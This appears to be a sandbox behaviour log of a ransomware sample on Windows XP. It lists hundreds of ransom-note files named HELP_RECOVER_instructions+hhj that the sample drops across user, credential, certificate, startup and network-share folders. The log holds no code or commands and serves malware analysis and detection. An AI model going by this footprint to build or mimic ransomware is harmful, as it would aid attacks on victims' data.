Creates FileC:\Documents and Settings\Default User\Local Settings\History\History.IE5\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Cookies\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\NetHood\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\My Documents\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\appcompat.txt
Creates FileC:\Documents and Settings\Administrator\Templates\powerpnt.ppt
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Templates\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Favorites\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Templates\quattro.wb2
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Local Settings\Temp\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Start Menu\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+hhj.txt
Creates FilePIPE\srvsvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Start Menu\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\PrintHood\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Application Data\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Start Menu\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Cookies\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Local Settings\History\History.IE5\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Games\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Recent\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\SendTo\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Templates\winword.doc
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\History\History.IE5\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Favorites\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\LocalService\Application Data\AdobeUM\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Local Settings\Temp\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\9.0\Collab\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\DRM\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\History\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Local Settings\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Games\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\manifest.txt
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\DRM\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
Creates FileC:\Documents and Settings\Default User\Templates\excel4.xls
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\SendTo\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Games\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Application Data\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Templates\quattro.wb2
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hhj.html
